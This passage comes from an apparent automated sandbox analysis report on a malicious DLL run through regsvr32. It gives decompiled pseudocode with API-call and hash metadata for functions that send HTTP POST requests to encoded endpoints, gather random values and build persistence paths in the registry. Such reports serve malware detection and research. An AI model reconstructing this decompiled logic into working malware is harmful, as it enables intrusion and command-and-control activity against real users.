                  										goto L38;
                  									}
                  									_t242 = E1000DA20( &_v80);
                  									goto L32;
                  								}
                  								if(__eflags == 0) {
                  									__eflags = _v72 - 0xffff;
                  									_t298 = L"TRUE";
                  									if(_v72 != 0xffff) {
                  										_t298 = L"FALSE";
                  									}
                  									goto L31;
                  								}
                  								_t243 = _t218 - 1;
                  								__eflags = _t243;
                  								if(_t243 == 0) {
                  									goto L38;
                  								}
                  								_t244 = _t243 - 1;
                  								__eflags = _t244;
                  								if(_t244 == 0) {
                  									goto L35;
                  								}
                  								_t245 = _t244 - 1;
                  								__eflags = _t245;
                  								if(_t245 == 0) {
                  									goto L35;
                  								}
                  								__eflags = _t245 != 5;
                  								if(_t245 != 5) {
                  									goto L28;
                  								}
                  								_t298 = _v72;
                  								goto L31;
                  							}
                  							__imp__#16(_v24);
                  							_t210 = _v28;
                  							 *((intOrPtr*)( *_t210 + 8))(_t210);
                  							_t252 = _v20;
                  							L42:
                  							_t262 = _v32;
                  							_t252 = _t252 + 1;
                  							_v20 = _t252;
                  							__eflags = _t262;
                  							if(_t262 != 0) {
                  								continue;
                  							}
                  							L48:
                  							_t324 = _v40;
                  							goto L49;
                  						}
                  						_t247 = _v28;
                  						 *((intOrPtr*)( *_t247 + 8))(_t247);
                  						goto L42;
                  					}
                  					_t262 = _v32;
                  					goto L48;
                  				} else {
                  					E1000861A( &_v36, _t322);
                  					_t320 = _v36;
                  					goto L53;
                  				}
                  			}

                  APIs
                    • Part of subcall function 1000D523: CoInitializeEx.OLE32(00000000,00000000), ref: 1000D536
                    • Part of subcall function 1000D523: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 1000D547
                    • Part of subcall function 1000D523: CoCreateInstance.OLE32(1001B848,00000000,00000001,1001B858,?), ref: 1000D55E
                    • Part of subcall function 1000D523: SysAllocString.OLEAUT32(00000000), ref: 1000D569
                    • Part of subcall function 1000D523: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 1000D594
                    • Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612
                  • SysAllocString.OLEAUT32(00000000), ref: 1000DBE5
                  • SysAllocString.OLEAUT32(00000000), ref: 1000DBF9
                  • SysFreeString.OLEAUT32(?), ref: 1000DF82
                  • SysFreeString.OLEAUT32(?), ref: 1000DF8B
                    • Part of subcall function 1000861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 10008660
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.497736251.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000005.00000002.497731437.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000005.00000002.497749205.0000000010018000.00000002.00020000.sdmp
                  • Associated: 00000005.00000002.497757016.000000001001D000.00000004.00020000.sdmp
                  • Associated: 00000005.00000002.497762389.000000001001F000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd
                  Similarity
                  • API ID: String$Alloc$Free$HeapInitialize$BlanketCreateInstanceProxySecurity
                  • String ID: FALSE$TRUE
                  • API String ID: 224402418-1412513891
                  • Opcode ID: 5d92cc2ce36c8b73f617da86ff32e213aea554078eedf743720070c244731c5e
                  • Instruction ID: 5411e9e7cadc0f68074cac65ab41d21575f1dfdd33ecf7b2672d11ac1b24c815
                  • Opcode Fuzzy Hash: 5d92cc2ce36c8b73f617da86ff32e213aea554078eedf743720070c244731c5e
                  • Instruction Fuzzy Hash: 13E16375D002199FEB15EFE4C885EEEBBB9FF48380F10415AF505AB259DB31AA01CB60
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 83%
                  			E1000E668(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr _a24) {
                  				char _v8;
                  				char _v12;
                  				signed int _v16;
                  				signed int _v20;
                  				char _v24;
                  				intOrPtr _v28;
                  				char _v32;
                  				intOrPtr _v36;
                  				signed int _v40;
                  				signed int _v44;
                  				intOrPtr _v48;
                  				intOrPtr _v52;
                  				intOrPtr _v56;
                  				intOrPtr _v60;
                  				char _v64;
                  				int _v76;
                  				void* _v80;
                  				intOrPtr _v100;
                  				int _v104;
                  				void* _v108;
                  				intOrPtr _v112;
                  				intOrPtr _v116;
                  				char* _v120;
                  				void _v124;
                  				char _v140;
                  				void _v396;
                  				void _v652;
                  				intOrPtr _t105;
                  				intOrPtr _t113;
                  				intOrPtr* _t115;
                  				intOrPtr _t118;
                  				intOrPtr _t121;
                  				intOrPtr _t124;
                  				intOrPtr _t127;
                  				intOrPtr _t131;
                  				char _t133;
                  				intOrPtr _t136;
                  				char _t138;
                  				char _t139;
                  				intOrPtr _t141;
                  				intOrPtr _t147;
                  				intOrPtr _t154;
                  				intOrPtr _t158;
                  				intOrPtr _t162;
                  				intOrPtr _t164;
                  				intOrPtr _t166;
                  				intOrPtr _t172;
                  				intOrPtr _t176;
                  				void* _t183;
                  				void* _t185;
                  				intOrPtr _t186;
                  				char _t195;
                  				intOrPtr _t203;
                  				intOrPtr _t204;
                  				signed int _t209;
                  				void _t212;
                  				intOrPtr _t213;
                  				void* _t214;
                  				intOrPtr _t216;
                  				char _t217;
                  				intOrPtr _t218;
                  				signed int _t219;
                  				signed int _t220;
                  				void* _t221;
                  
                  				_v40 = _v40 & 0x00000000;
                  				_v24 = 4;
                  				_v36 = 1;
                  				_t214 = __edx;
                  				memset( &_v396, 0, 0x100);
                  				memset( &_v652, 0, 0x100);
                  				_v64 = E100095C7(0x85b);
                  				_v60 = E100095C7(0xdc9);
                  				_v56 = E100095C7(0x65d);
                  				_v52 = E100095C7(0xdd3);
                  				_t105 = E100095C7(0xb74);
                  				_v44 = _v44 & 0;
                  				_t212 = 0x3c;
                  				_v48 = _t105;
                  				memset( &_v124, 0, 0x100);
                  				_v116 = 0x10;
                  				_v120 =  &_v140;
                  				_v124 = _t212;
                  				_v108 =  &_v396;
                  				_v104 = 0x100;
                  				_v80 =  &_v652;
                  				_push( &_v124);
                  				_push(0);
                  				_v76 = 0x100;
                  				_push(E1000C379(_t214));
                  				_t113 =  *0x1001e6a4; // 0x0
                  				_push(_t214);
                  				if( *((intOrPtr*)(_t113 + 0x28))() != 0) {
                  					_t209 = 0;
                  					_v20 = 0;
                  					do {
                  						_t115 =  *0x1001e6a4; // 0x0
                  						_v12 = 0x8404f700;
                  						_t213 =  *_t115( *0x1001e788,  *((intOrPtr*)(_t221 + _t209 * 4 - 0x24)), 0, 0, 0);
                  						if(_t213 != 0) {
                  							_t195 = 3;
                  							_t185 = 4;
                  							_v8 = _t195;
                  							_t118 =  *0x1001e6a4; // 0x0
                  							 *((intOrPtr*)(_t118 + 0x14))(_t213, _t195,  &_v8, _t185);
                  							_v8 = 0x3a98;
                  							_t121 =  *0x1001e6a4; // 0x0
                  							 *((intOrPtr*)(_t121 + 0x14))(_t213, 2,  &_v8, _t185);
                  							_v8 = 0x493e0;
                  							_t124 =  *0x1001e6a4; // 0x0
                  							 *((intOrPtr*)(_t124 + 0x14))(_t213, 6,  &_v8, _t185);
                  							_v8 = 0x493e0;
                  							_t127 =  *0x1001e6a4; // 0x0
                  							 *((intOrPtr*)(_t127 + 0x14))(_t213, 5,  &_v8, _t185);
                  							_t131 =  *0x1001e6a4; // 0x0
                  							_t186 =  *((intOrPtr*)(_t131 + 0x1c))(_t213,  &_v396, _v100, 0, 0, 3, 0, 0);
                  							if(_a24 != 0) {
                  								E1000980C(_a24);
                  							}
                  							if(_t186 != 0) {
                  								_t133 = 0x8484f700;
                  								if(_v112 != 4) {
                  									_t133 = _v12;
                  								}
                  								_t136 =  *0x1001e6a4; // 0x0
                  								_t216 =  *((intOrPtr*)(_t136 + 0x20))(_t186, "POST",  &_v652, 0, 0,  &_v64, _t133, 0);
                  								_v8 = _t216;
                  								if(_a24 != 0) {
                  									E1000980C(_a24);
                  								}
                  								if(_t216 != 0) {
                  									_t138 = 4;
                  									if(_v112 != _t138) {
                  										L19:
                  										_t139 = E100095C7(0x777);
                  										_t217 = _t139;
                  										_v12 = _t217;
                  										_t141 =  *0x1001e6a4; // 0x0
                  										_t218 = _v8;
                  										_v28 =  *((intOrPtr*)(_t141 + 0x24))(_t218, _t217, E1000C379(_t217), _a4, _a8);
                  										E100085C2( &_v12);
                  										if(_a24 != 0) {
                  											E1000980C(_a24);
                  										}
                  										if(_v28 != 0) {
                  											L28:
                  											_v24 = 8;
                  											_push(0);
                  											_v32 = 0;
                  											_v28 = 0;
                  											_push( &_v24);
                  											_push( &_v32);
                  											_t147 =  *0x1001e6a4; // 0x0
                  											_push(0x13);
                  											_push(_t218);
                  											if( *((intOrPtr*)(_t147 + 0xc))() != 0) {
                  												_t219 = E10009749( &_v32);
                  												if(_t219 == 0xc8) {
                  													 *_a20 = _v8;
                  													 *_a12 = _t213;
                  													 *_a16 = _t186;
                  													return 0;
                  												}
                  												_t220 =  ~_t219;
                  												L32:
                  												_t154 =  *0x1001e6a4; // 0x0
                  												 *((intOrPtr*)(_t154 + 8))(_v8);
                  												L33:
                  												if(_t186 != 0) {
                  													_t158 =  *0x1001e6a4; // 0x0
                  													 *((intOrPtr*)(_t158 + 8))(_t186);
                  												}
                  												if(_t213 != 0) {
                  													_t203 =  *0x1001e6a4; // 0x0
                  													 *((intOrPtr*)(_t203 + 8))(_t213);
                  												}
                  												return _t220;
                  											}
                  											GetLastError();
                  											_t220 = 0xfffffff8;
                  											goto L32;
                  										} else {
                  											GetLastError();
                  											_t162 =  *0x1001e6a4; // 0x0
                  											 *((intOrPtr*)(_t162 + 8))(_t218);
                  											_t218 = 0;
                  											goto L23;
                  										}
                  									}
                  									_v12 = _t138;
                  									_push( &_v12);
                  									_push( &_v16);
                  									_t172 =  *0x1001e6a4; // 0x0
                  									_push(0x1f);
                  									_push(_t216);
                  									if( *((intOrPtr*)(_t172 + 0x18))() == 0) {
                  										L18:
                  										GetLastError();
                  										goto L19;
                  									}
                  									_v16 = _v16 | 0x00003380;
                  									_push(4);
                  									_push( &_v16);
                  									_t176 =  *0x1001e6a4; // 0x0
                  									_push(0x1f);
                  									_push(_t216);
                  									if( *((intOrPtr*)(_t176 + 0x14))() != 0) {
                  										goto L19;
                  									}
                  									goto L18;
                  								} else {
                  									GetLastError();
                  									L23:
                  									_t164 =  *0x1001e6a4; // 0x0
                  									 *((intOrPtr*)(_t164 + 8))(_t186);
                  									_t186 = 0;
                  									goto L24;
                  								}
                  							} else {
                  								GetLastError();
                  								L24:
                  								_t166 =  *0x1001e6a4; // 0x0
                  								 *((intOrPtr*)(_t166 + 8))(_t213);
                  								_t213 = 0;
                  								goto L25;
                  							}
                  						}
                  						GetLastError();
                  						L25:
                  						_t204 = _t218;
                  						_t209 = _v20 + 1;
                  						_v20 = _t209;
                  					} while (_t209 < 2);
                  					_v8 = _t218;
                  					if(_t204 != 0) {
                  						goto L28;
                  					}
                  					_t220 = 0xfffffffe;
                  					goto L33;
                  				}
                  				_t183 = 0xfffffffc;
                  				return _t183;
                  			}


                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.497736251.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000005.00000002.497731437.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000005.00000002.497749205.0000000010018000.00000002.00020000.sdmp
                  • Associated: 00000005.00000002.497757016.000000001001D000.00000004.00020000.sdmp
                  • Associated: 00000005.00000002.497762389.000000001001F000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd
                  Similarity
                  • API ID: memset$ErrorLast
                  • String ID: POST
                  • API String ID: 2570506013-1814004025
                  • Opcode ID: 9666fa5b7544119ad2a1acce946c7c4cd061c2ef1cd09bcb1a5d5842fa234375
                  • Instruction ID: 0700470c0a68c42d93125f8ed8f5d74d0b9e7f5cef555f12c6cb43bca8eeeaa5
                  • Opcode Fuzzy Hash: 9666fa5b7544119ad2a1acce946c7c4cd061c2ef1cd09bcb1a5d5842fa234375
                  • Instruction Fuzzy Hash: ACB14CB1900258AFEB55CFA4CC88E9E7BF8EF48390F108069F505EB291DB749E44CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 28%
                  			E100116B8(signed int* _a4) {
                  				char _v8;
                  				_Unknown_base(*)()* _v12;
                  				_Unknown_base(*)()* _v16;
                  				char _v20;
                  				_Unknown_base(*)()* _t16;
                  				_Unknown_base(*)()* _t17;
                  				void* _t22;
                  				intOrPtr* _t28;
                  				signed int _t29;
                  				signed int _t30;
                  				struct HINSTANCE__* _t32;
                  				void* _t34;
                  
                  				_t30 = 0;
                  				_v8 = 0;
                  				_t32 = GetModuleHandleA("advapi32.dll");
                  				if(_t32 == 0) {
                  					L9:
                  					return 1;
                  				}
                  				_t16 = GetProcAddress(_t32, "CryptAcquireContextA");
                  				_v12 = _t16;
                  				if(_t16 == 0) {
                  					goto L9;
                  				}
                  				_t17 = GetProcAddress(_t32, "CryptGenRandom");
                  				_v16 = _t17;
                  				if(_t17 == 0) {
                  					goto L9;
                  				}
                  				_t28 = GetProcAddress(_t32, "CryptReleaseContext");
                  				if(_t28 == 0) {
                  					goto L9;
                  				}
                  				_push(0xf0000000);
                  				_push(1);
                  				_push(0);
                  				_push(0);
                  				_push( &_v8);
                  				if(_v12() == 0) {
                  					goto L9;
                  				}
                  				_t22 = _v16(_v8, 4,  &_v20);
                  				 *_t28(_v8, 0);
                  				if(_t22 == 0) {
                  					goto L9;
                  				}
                  				_t29 = 0;
                  				do {
                  					_t30 = _t30 << 0x00000008 |  *(_t34 + _t29 - 0x10) & 0x000000ff;
                  					_t29 = _t29 + 1;
                  				} while (_t29 < 4);
                  				 *_a4 = _t30;
                  				return 0;
                  			}


                  APIs
                  • GetModuleHandleA.KERNEL32(advapi32.dll,00000000,00000000,00000000,1000765A,?,?,00000000,?), ref: 100116CB
                  • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,00000000,?), ref: 100116E3
                  • GetProcAddress.KERNEL32(00000000,CryptGenRandom,?,?,00000000,?), ref: 100116F2
                  • GetProcAddress.KERNEL32(00000000,CryptReleaseContext,?,?,00000000,?), ref: 10011701
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.497736251.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000005.00000002.497731437.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000005.00000002.497749205.0000000010018000.00000002.00020000.sdmp
                  • Associated: 00000005.00000002.497757016.000000001001D000.00000004.00020000.sdmp
                  • Associated: 00000005.00000002.497762389.000000001001F000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd
                  Similarity
                  • API ID: AddressProc$HandleModule
                  • String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
                  • API String ID: 667068680-129414566
                  • Opcode ID: 20942a7a4906dbf7eb0602444a63a434b6f70734ef2710fea449a0a33fd0044b
                  • Instruction ID: d36a475728834fa58dcafee8eb85b3ba20c501ff2e9645169ff1056c09a1da39
                  • Opcode Fuzzy Hash: 20942a7a4906dbf7eb0602444a63a434b6f70734ef2710fea449a0a33fd0044b
                  • Instruction Fuzzy Hash: 57117735D04615BBDB52DBAA8C84EEF7BF9EF45680F010064EA15FA240DB30DB408764
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 87%
                  			E10012122(char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
                  				signed int _t12;
                  				signed int _t13;
                  				int _t15;
                  				char* _t24;
                  				char* _t26;
                  				char* _t28;
                  				char* _t29;
                  				signed int _t40;
                  				char* _t43;
                  				char* _t45;
                  				long long* _t47;
                  
                  				_t12 = _a20;
                  				if(_t12 == 0) {
                  					_t12 = 0x11;
                  				}
                  				_t26 = _a4;
                  				_push(_t30);
                  				 *_t47 = _a12;
                  				_push(_t12);
                  				_push("%.*g");
                  				_push(_a8);
                  				_push(_t26);
                  				L10012285();
                  				_t40 = _t12;
                  				if(_t40 < 0 || _t40 >= _a8) {
                  					L19:
                  					_t13 = _t12 | 0xffffffff;
                  					goto L20;
                  				} else {
                  					L100122CD();
                  					_t15 =  *((intOrPtr*)( *_t12));
                  					if(_t15 != 0x2e) {
                  						_t24 = strchr(_t26, _t15);
                  						if(_t24 != 0) {
                  							 *_t24 = 0x2e;
                  						}
                  					}
                  					if(strchr(_t26, 0x2e) != 0 || strchr(_t26, 0x65) != 0) {
                  						L11:
                  						_t43 = strchr(_t26, 0x65);
                  						_t28 = _t43;
                  						if(_t43 == 0) {
                  							L18:
                  							_t13 = _t40;
                  							L20:
                  							return _t13;
                  						}
                  						_t45 = _t43 + 1;
                  						_t29 = _t28 + 2;
                  						if( *_t45 == 0x2d) {
                  							_t45 = _t29;
                  						}
                  						while( *_t29 == 0x30) {
                  							_t29 = _t29 + 1;
                  						}
                  						if(_t29 != _t45) {
                  							E10008706(_t45, _t29, _t40 - _t29 + _a4);
                  							_t40 = _t40 + _t45 - _t29;
                  						}
                  						goto L18;
                  					} else {
                  						_t6 = _t40 + 3; // 0x100109b2
                  						_t12 = _t6;
                  						if(_t12 >= _a8) {
                  							goto L19;
                  						}
                  						_t26[_t40] = 0x302e;
                  						( &(_t26[2]))[_t40] = 0;
                  						_t40 = _t40 + 2;
                  						goto L11;
                  					}
                  				}
                  			}


                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.497736251.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000005.00000002.497731437.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000005.00000002.497749205.0000000010018000.00000002.00020000.sdmp
                  • Associated: 00000005.00000002.497757016.000000001001D000.00000004.00020000.sdmp
                  • Associated: 00000005.00000002.497762389.000000001001F000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd
                  Similarity
                  • API ID: strchr$_snprintflocaleconv
                  • String ID: %.*g
                  • API String ID: 1910550357-952554281
                  • Opcode ID: c4e2036c81f1f18131b8e055db18669b76aa49e64ef9a1be148b7d3467e3c398
                  • Instruction ID: 8636af6e6c8ef7ea176c693fecce787b547d9a6025bf48258b91e4e7d6eda4ac
                  • Opcode Fuzzy Hash: c4e2036c81f1f18131b8e055db18669b76aa49e64ef9a1be148b7d3467e3c398
                  • Instruction Fuzzy Hash: 562138FA6046567AD311CA689CC6B5E3BDCDF15260F250115FE509E182E674ECF483A0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.497736251.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000005.00000002.497731437.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000005.00000002.497749205.0000000010018000.00000002.00020000.sdmp
                  • Associated: 00000005.00000002.497757016.000000001001D000.00000004.00020000.sdmp
                  • Associated: 00000005.00000002.497762389.000000001001F000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd
                  Similarity
                  • API ID: _snprintfqsort
                  • String ID: %I64d$false$null$true
                  • API String ID: 756996078-4285102228
                  • Opcode ID: 27ee6084afeff88239f383b3bb26a63d700df7a8d62648484173ceb74af6d73e
                  • Instruction ID: b3da69db5d3f4e878d7882629df3b6b2364259ca5c53272952ed0c313758977d
                  • Opcode Fuzzy Hash: 27ee6084afeff88239f383b3bb26a63d700df7a8d62648484173ceb74af6d73e
                  • Instruction Fuzzy Hash: BCE150B1A0024ABBDF11DE64CC45EEF3BA9EF45384F108015FD549E141EBB5EAE19BA0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E10004A0B(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, signed int _a12) {
                  				char _v516;
                  				void _v1044;
                  				char _v1076;
                  				signed int _v1080;
                  				signed int _v1096;
                  				WCHAR* _v1100;
                  				intOrPtr _v1104;
                  				signed int _v1108;
                  				intOrPtr _v1112;
                  				intOrPtr _v1116;
                  				char _v1144;
                  				char _v1148;
                  				void* __esi;
                  				intOrPtr _t66;
                  				intOrPtr _t73;
                  				signed int _t75;
                  				intOrPtr _t76;
                  				signed int _t81;
                  				WCHAR* _t87;
                  				void* _t89;
                  				signed int _t90;
                  				signed int _t91;
                  				signed int _t93;
                  				signed int _t94;
                  				WCHAR* _t96;
                  				intOrPtr _t106;
                  				intOrPtr _t107;
                  				void* _t108;
                  				intOrPtr _t109;
                  				signed char _t116;
                  				WCHAR* _t118;
                  				void* _t122;
                  				signed int _t123;
                  				intOrPtr _t125;
                  				void* _t128;
                  				void* _t129;
                  				WCHAR* _t130;
                  				void* _t134;
                  				void* _t141;
                  				void* _t143;
                  				WCHAR* _t145;
                  				signed int _t153;
                  				void* _t154;
                  				void* _t178;
                  				signed int _t180;
                  				void* _t181;
                  				void* _t183;
                  				void* _t187;
                  				signed int _t188;
                  				WCHAR* _t190;
                  				signed int _t191;
                  				signed int _t192;
                  				intOrPtr* _t194;
                  				signed int _t196;
                  				void* _t199;
                  				void* _t200;
                  				void* _t201;
                  				void* _t202;
                  				intOrPtr* _t203;
                  				void* _t208;
                  
                  				_t208 = __fp0;
                  				_push(_t191);
                  				_t128 = __edx;
                  				_t187 = __ecx;
                  				_t192 = _t191 | 0xffffffff;
                  				memset( &_v1044, 0, 0x20c);
                  				_t199 = (_t196 & 0xfffffff8) - 0x454 + 0xc;
                  				_v1108 = 1;
                  				if(_t187 != 0) {
                  					_t123 =  *0x1001e688; // 0x2bb0590
                  					_t3 = _t123 + 0x110; // 0x2c2fd98
                  					_t125 =  *0x1001e68c; // 0x2c2fc68
                  					_v1116 =  *((intOrPtr*)(_t125 + 0x68))(_t187,  *((intOrPtr*)( *_t3)));
                  				}
                  				if(E1000BB8D(_t187) != 0) {
                  					L4:
                  					_t134 = _t128;
                  					_t66 = E1000B7A8(_t134,  &_v516);
                  					_push(_t134);
                  					_v1104 = _t66;
                  					E1000B67D(_t66,  &_v1076, _t206, _t208);
                  					_t129 = E100049C7( &_v1076,  &_v1076, _t206);
                  					_t141 = E1000D400( &_v1076, E1000C379( &_v1076), 0);
                  					E1000B88A(_t141,  &_v1100, _t208);
                  					_t175 =  &_v1076;
                  					_t73 = E10002C8F(_t187,  &_v1076, _t206, _t208);
                  					_v1112 = _t73;
                  					_t143 = _t141;
                  					if(_t73 != 0) {
                  						_push(0);
                  						_push(_t129);
                  						_push("\\");
                  						_t130 = E100092E5(_t73);
                  						_t200 = _t199 + 0x10;
                  						_t75 =  *0x1001e688; // 0x2bb0590
                  						__eflags =  *((intOrPtr*)(_t75 + 0x214)) - 3;
                  						if( *((intOrPtr*)(_t75 + 0x214)) != 3) {
                  							L12:
                  							__eflags = _v1108;
                  							if(__eflags != 0) {
                  								_t76 = E100091E3(_v1112);
                  								_t145 = _t130;
                  								 *0x1001e740 = _t76;
                  								 *0x1001e738 = E100091E3(_t145);
                  								L17:
                  								_push(_t145);
                  								_t188 = E10009B43( &_v1044, _t187, _t208, _v1104,  &_v1080,  &_v1100);
                  								_t201 = _t200 + 0x10;
                  								__eflags = _t188;
                  								if(_t188 == 0) {
                  									goto L41;
                  								}
                  								_push(0x1001b9ca);
                  								E10009F48(0xe);
                  								E10009F6C(_t188, _t208, _t130);
                  								_t194 = _a4;
                  								_v1096 = _v1096 & 0x00000000;
                  								_push(2);
                  								_v1100 =  *_t194;
                  								_push(8);
                  								_push( &_v1100);
                  								_t178 = 0xb;
                  								E1000A0AB(_t188, _t178, _t208);
                  								_t179 =  *(_t194 + 0x10);
                  								_t202 = _t201 + 0xc;
                  								__eflags =  *(_t194 + 0x10);
                  								if( *(_t194 + 0x10) != 0) {
                  									E1000A3ED(_t188, _t179, _t208);
                  								}
                  								_t180 =  *(_t194 + 0xc);
                  								__eflags = _t180;
                  								if(_t180 != 0) {
                  									E1000A3ED(_t188, _t180, _t208);
                  								}
                  								_t87 = E1000980C(0);
                  								_push(2);
                  								_v1100 = _t87;
                  								_t153 = _t188;
                  								_push(8);
                  								_v1096 = _t180;
                  								_push( &_v1100);
                  								_t181 = 2;
                  								_t89 = E1000A0AB(_t153, _t181, _t208);
                  								_t203 = _t202 + 0xc;
                  								__eflags = _v1108;
                  								if(_v1108 == 0) {
                  									_t153 =  *0x1001e688; // 0x2bb0590
                  									__eflags =  *((intOrPtr*)(_t153 + 0xa4)) - 1;
                  									if(__eflags != 0) {
                  										_t90 = E1000FC1F(_t89, _t181, _t208, 0, _t130, 0);
                  										_t203 = _t203 + 0xc;
                  										goto L26;
                  									}
                  									_t153 = _t153 + 0x228;
                  									goto L25;
                  								} else {
                  									_t91 =  *0x1001e688; // 0x2bb0590
                  									__eflags =  *((intOrPtr*)(_t91 + 0xa4)) - 1;
                  									if(__eflags != 0) {
                  										L32:
                  										__eflags =  *(_t91 + 0x1898) & 0x00000082;
                  										if(( *(_t91 + 0x1898) & 0x00000082) != 0) {
                  											_t183 = 0x64;
                  											E1000E23E(_t183);
                  										}
                  										E100052C0( &_v1076, _t208);
                  										_t190 = _a8;
                  										_t154 = _t153;
                  										__eflags = _t190;
                  										if(_t190 != 0) {
                  											_t94 =  *0x1001e688; // 0x2bb0590
                  											__eflags =  *((intOrPtr*)(_t94 + 0xa0)) - 1;
                  											if( *((intOrPtr*)(_t94 + 0xa0)) != 1) {
                  												lstrcpyW(_t190, _t130);
                  											} else {
                  												_t96 = E1000109A(_t154, 0x228);
                  												_v1100 = _t96;
                  												lstrcpyW(_t190, _t96);
                  												E100085D5( &_v1100);
                  												 *_t203 = "\"";
                  												lstrcatW(_t190, ??);
                  												lstrcatW(_t190, _t130);
                  												lstrcatW(_t190, "\"");
                  											}
                  										}
                  										_t93 = _a12;
                  										__eflags = _t93;
                  										if(_t93 != 0) {
                  											 *_t93 = _v1104;
                  										}
                  										_t192 = 0;
                  										__eflags = 0;
                  										goto L41;
                  									}
                  									_t51 = _t91 + 0x228; // 0x2bb07b8
                  									_t153 = _t51;
                  									L25:
                  									_t90 = E1000553F(_t153, _t130, __eflags);
                  									L26:
                  									__eflags = _t90;
                  									if(_t90 >= 0) {
                  										_t91 =  *0x1001e688; // 0x2bb0590
                  										goto L32;
                  									}
                  									_push(0xfffffffd);
                  									L6:
                  									_pop(_t192);
                  									goto L41;
                  								}
                  							}
                  							_t106 = E1000C292(_v1104, __eflags);
                  							_v1112 = _t106;
                  							_t107 =  *0x1001e684; // 0x2c2faa0
                  							_t108 =  *((intOrPtr*)(_t107 + 0xd0))(_t106, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
                  							__eflags = _t108 - _t192;
                  							if(_t108 != _t192) {
                  								_t109 =  *0x1001e684; // 0x2c2faa0
                  								 *((intOrPtr*)(_t109 + 0x30))();
                  								E1000861A( &_v1148, _t192);
                  								_t145 = _t108;
                  								goto L17;
                  							}
                  							E1000861A( &_v1144, _t192);
                  							_t81 = 1;
                  							goto L42;
                  						}
                  						_t17 = _t75 + 0x1898; // 0x0
                  						_t116 =  *_t17;
                  						__eflags = _t116 & 0x00000004;
                  						if((_t116 & 0x00000004) == 0) {
                  							__eflags = _t116;
                  							if(_t116 != 0) {
                  								goto L12;
                  							}
                  							L11:
                  							E1000E286(_v1112, _t175);
                  							goto L12;
                  						}
                  						_v1080 = _v1080 & 0x00000000;
                  						_t118 = E100095E1(_t143, 0x879);
                  						_v1100 = _t118;
                  						_t175 = _t118;
                  						E1000BFEC(0x80000002, _t118, _v1112, 4,  &_v1080, 4);
                  						E100085D5( &_v1100);
                  						_t200 = _t200 + 0x14;
                  						goto L11;
                  					}
                  					_push(0xfffffffe);
                  					goto L6;
                  				} else {
                  					_t122 = E10002BA4( &_v1044, _t192, 0x105);
                  					_t206 = _t122;
                  					if(_t122 == 0) {
                  						L41:
                  						_t81 = _t192;
                  						L42:
                  						return _t81;
                  					}
                  					goto L4;
                  				}
                  			}

                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.497736251.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000005.00000002.497731437.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000005.00000002.497749205.0000000010018000.00000002.00020000.sdmp
                  • Associated: 00000005.00000002.497757016.000000001001D000.00000004.00020000.sdmp
                  • Associated: 00000005.00000002.497762389.000000001001F000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd
                  Similarity
                  • API ID: lstrcat$lstrcpy$memset
                  • String ID:
                  • API String ID: 1985475764-0
                  • Opcode ID: 9c0abdd94eabe914945b90b3f23502be936d310f05b3141c419733170b2e759b
                  • Instruction ID: f7566e60c9d6103eeec9fdfcf7230380432adf105638aba250afc4f9be1d7fc6
                  • Opcode Fuzzy Hash: 9c0abdd94eabe914945b90b3f23502be936d310f05b3141c419733170b2e759b
                  • Instruction Fuzzy Hash: 60919AB5604305AFF314DB20CC86F6E73E9EB84390F12492EF5958B299EF70E9448B56
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • SysAllocString.OLEAUT32(00000000), ref: 1000D75C
                  • SysAllocString.OLEAUT32(?), ref: 1000D764
                  • SysAllocString.OLEAUT32(00000000), ref: 1000D778
